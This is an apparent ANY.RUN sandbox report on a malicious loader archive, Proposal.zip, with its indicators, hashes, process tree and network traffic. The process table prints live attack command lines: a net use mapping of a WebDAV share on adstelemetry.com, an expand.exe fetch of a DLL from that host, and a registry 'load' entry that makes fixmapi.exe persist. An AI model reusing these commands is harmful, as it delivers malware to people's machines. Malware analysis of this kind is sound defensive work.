File name:

Proposal.zip

Full analysis: https://app.any.run/tasks/6efc9793-a0a3-42f3-8a63-b1339d03751f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 10, 2025, 07:25:48
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
reflection
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

535973A9DAA0F7ADC4E3248724252778

SHA1:

8F901B64FC57276C7597A95383953B57B6C56A92

SHA256:

F3DA5FA264007B9680CA035357183E2C37C95CB053393700E85D53F7478925A3

SSDEEP:

12288:LOOahzz/Wbn3f0NCESjYPdYsPmZaujuhMdAqbOiQ87:LO1ZzObn3f0NCE8mdYsP+aujuhMRbOiL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6924)
      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)

    • Changes powershell execution policy (Bypass)

      • fixmapi.exe (PID: 5300)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)

    • Downloads the requested resource (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Uses AES cipher (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Dynamically loads an assembly (POWERSHELL)

      • fixmapi.exe (PID: 5300)

  • SUSPICIOUS

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 6924)

    • Manipulates environment variables

      • powershell.exe (PID: 6924)

    • Possibly malicious use of IEX has been detected

      • WinRAR.exe (PID: 4204)

    • Starts POWERSHELL.EXE for commands execution

      • WinRAR.exe (PID: 4204)
      • fixmapi.exe (PID: 5300)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 6924)

    • Starts NET.EXE to map network drives

      • powershell.exe (PID: 6924)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 6924)

    • Executable content was dropped or overwritten

      • expand.exe (PID: 1076)
      • powershell.exe (PID: 6924)
      • svchost.exe (PID: 2084)
      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)

    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 2084)

    • Abuses WebDav for code execution

      • svchost.exe (PID: 2084)

    • The process executes via Task Scheduler

      • fixmapi.exe (PID: 5300)

    • Reads security settings of Internet Explorer

      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)
      • WinRAR.exe (PID: 4204)

    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 7136)
      • powershell.exe (PID: 7048)
      • cmd.exe (PID: 236)

    • Checks Windows Trust Settings

      • fixmapi.exe (PID: 5300)

    • Gets or sets the security protocol (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Reads Microsoft Outlook installation path

      • fixmapi.exe (PID: 5300)

    • Reads Internet Explorer settings

      • fixmapi.exe (PID: 5300)

    • Starts a new process with hidden mode (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets information about processes (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Converts a string into array of characters (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Checks a user's role membership (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Starts CMD.EXE for commands execution

      • fixmapi.exe (PID: 5300)

  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 4204)
      • RegAsm.exe (PID: 2132)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)

    • Application launched itself

      • Acrobat.exe (PID: 4704)
      • AcroCEF.exe (PID: 6296)
      • msedge.exe (PID: 2600)
      • msedge.exe (PID: 6228)

    • Sends debugging messages

      • Acrobat.exe (PID: 5096)

    • Reads the software policy settings

      • net.exe (PID: 736)

    • The sample compiled with english language support

      • powershell.exe (PID: 6924)
      • msedge.exe (PID: 7632)

    • Manual execution by a user

      • msedge.exe (PID: 2600)

    • Checks proxy server information

      • net.exe (PID: 736)

    • Checks supported languages

      • expand.exe (PID: 1076)
      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6924)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6924)

    • Reads the computer name

      • fixmapi.exe (PID: 5300)

    • Reads the machine GUID from the registry

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Converts byte array into ASCII string (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Uses string split method (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Creates a byte array (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Create files in a temporary directory

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7632)

    • Uses string replace method (POWERSHELL)

      • fixmapi.exe (PID: 5300)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 6924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2025:01:02 05:40:42
ZipCRC: 0xa28b6148
ZipCompressedSize: 328823
ZipUncompressedSize: 342511
ZipFileName: Proposal.lnk
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
249
Monitored processes
113
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs powershell.exe conhost.exe no specs rundll32.exe no specs acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs net.exe svchost.exe acrocef.exe no specs expand.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs fixmapi.exe regasm.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs msedge.exe no specs msedge.exe no specs csc.exe conhost.exe no specs cvtres.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
236"C:\WINDOWS\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /d C:\Windows\Tasks\fixmapi.exe /fC:\Windows\System32\cmd.exefixmapi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
640"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
736"C:\WINDOWS\system32\net.exe" use \\adstelemetry.com@SSL@443\hBHcHa\C:\Windows\System32\net.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\mpr.dll
736"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2368 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1044"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --no-appcompat-clear --mojo-platform-channel-handle=5380 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076"C:\WINDOWS\system32\expand.exe" \\adstelemetry.com@SSL@443\hBHcHa\mapistubx64.dll c:\windows\tasks\mapistub.dllC:\Windows\System32\expand.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1220"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1488"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3200 --field-trial-handle=2204,i,13151857812966353076,3986580673643499751,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1576"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2208 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1580"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5912 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
114 227
Read events
113 940
Write events
272
Delete events
15

Modification events

(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Proposal.zip
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(4204) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files
47
Suspicious files
1 310
Text files
244
Unknown types
2

Dropped files

PID
Process
Filename
Type
5096Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.jsonbinary
MD5:837C1211E392A24D64C670DC10E8DA1B
SHA256:8013AC030684B86D754BBFBAB8A9CEC20CAA4DD9C03022715FF353DC10E14031
4204WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb4204.27005\Proposal.lnkbinary
MD5:81E0E395446DF8633E5C0601FF318773
SHA256:2C60D60F2145735F5AB0E082C38D28401DB7D57CCF69970A04DD92AA0FD4A472
6924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SAHRCJXJWLYGK2SYTS4L.tempbinary
MD5:3880E8C032EBC11601995C238979FDF2
SHA256:C0F39E58A3E8EC0FF8FF3F44201DE3A5D3DC39A65FF044BD149693318B53F43C
6924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ccr0hty.dze.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f0ca72e1392931db.customDestinations-msbinary
MD5:3880E8C032EBC11601995C238979FDF2
SHA256:C0F39E58A3E8EC0FF8FF3F44201DE3A5D3DC39A65FF044BD149693318B53F43C
5096Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsbinary
MD5:3F01031827DFDC84F0683449EF1FC31F
SHA256:EA098183C4F992818F88814EEE2DB341BEAC83F03701EFE04905C86CAAF6439D
5096Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:896F6F4CDA01D416209F7A83D5076F98
SHA256:E03A6B84C323F3F965CD349A7D71280C2330A322D860B287F1B414B080741E00
4704Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstbinary
MD5:366B140BAFC863B7E366AA1E51604759
SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
6296AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF1400ba.TMPtext
MD5:D012E5B4EB91B61F6E8AE2F8EC3C623E
SHA256:1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673
5096Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5096binary
MD5:366B140BAFC863B7E366AA1E51604759
SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
48
TCP/UDP connections
240
DNS requests
209
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7012
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.242.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6216
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5340
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4704
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
whitelisted
7012
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d
unknown
whitelisted
7012
svchost.exe
HEAD
200
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/d50ccf3e-dd06-4e6f-bb20-931c8ce33527?P1=1736952451&P2=404&P3=2&P4=YHQTlmt7pKGZIvLzG2a0n4mj7Wr5t6f6GdwQ2Y0OkZNO1nQAguJc59TGP6dyiHN7CSkMHqW7lW8Ib4sLD4EfdQ%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1488
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.23.242.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.227.221:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.72
whitelisted
www.microsoft.com
  • 2.23.242.101
  • 95.101.149.131
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 2.23.227.221
  • 2.23.227.208
  • 2.23.227.202
  • 2.23.227.215
  • 104.126.37.137
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.185
  • 104.126.37.139
  • 104.126.37.123
  • 104.126.37.144
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.163
  • 104.126.37.155
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.186
  • 104.126.37.171
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.4
  • 40.126.31.67
  • 20.190.159.73
  • 40.126.31.71
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
settings-win.data.microsoft.com
